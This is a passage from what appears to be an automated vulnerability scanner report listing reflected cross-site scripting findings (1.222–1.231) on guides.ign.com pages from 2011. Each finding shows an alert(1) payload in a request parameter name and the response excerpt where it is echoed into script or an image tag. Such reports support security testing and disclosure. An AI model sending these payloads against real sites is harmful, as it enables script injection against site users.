<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14341976/?2a72d"-alert(1)-"d0fe4cf0b4=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.222. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14341976/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b0f8"><script>alert(1)</script>c82848e0415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14341976/?2b0f8"><script>alert(1)</script>c82848e0415=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:51 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13272-570928520-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:51 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043511894v-1n-12mc+1297043511894mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14341976/?2b0f8"><script>alert(1)</script>c82848e0415=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.223. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14349501/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79fa1"><script>alert(1)</script>4d9b8b5138e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14349501/?79fa1"><script>alert(1)</script>4d9b8b5138e=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-1800780367-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043509127v-1n-12mc+1297043509127mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 97958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14349501/?79fa1"><script>alert(1)</script>4d9b8b5138e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.224. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14349501/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f36"-alert(1)-"33758481171 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14349501/?a2f36"-alert(1)-"33758481171=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-1777948420-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043513101v-1n-12mc+1297043513101mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 97926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14349501/?a2f36"-alert(1)-"33758481171=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.225. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14354229/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa952"-alert(1)-"9cf633cfd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:44 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-1024535077-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:44 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043504486v-1n-12mc+1297043504486mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 103450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.226. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14354229/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63fce"><script>alert(1)</script>0df05f822a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14354229/?63fce"><script>alert(1)</script>0df05f822a8=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27912-202697953-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043500981v-1n-12mc+1297043500981mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 103524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14354229/?63fce"><script>alert(1)</script>0df05f822a8=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.227. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/57512/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b175"><script>alert(1)</script>368b0241e73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/57512/?2b175"><script>alert(1)</script>368b0241e73=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:42 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-1130846996-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:42 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043502870v-1n-12mc+1297043502870mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/57512/?2b175"><script>alert(1)</script>368b0241e73=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.228. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/57512/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d1a"-alert(1)-"2edcddf6365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/57512/?18d1a"-alert(1)-"2edcddf6365=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-1308755600-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043509654v-1n-12mc+1297043509654mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 103290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/57512/?18d1a"-alert(1)-"2edcddf6365=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.229. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /index/nintendo-ds-guides/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7965"><script>alert(1)</script>dd303f9c616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:52:06 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-185637828-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:52:06 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043526579v-1n-12mc+1297043526579mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.230. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /index/nintendo-ds-guides/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae7f8"-alert(1)-"ca818502e9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/nintendo-ds-guides/index.html?ae7f8"-alert(1)-"ca818502e9b=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:52:12 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26954-200633787-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:52:12 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043532207v-1n-12mc+1297043532207mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 115750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
== 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/index/nintendo-ds-guides/index.html?ae7f8"-alert(1)-"ca818502e9b=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.231. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /index/pc-guides/index.html

Issue detail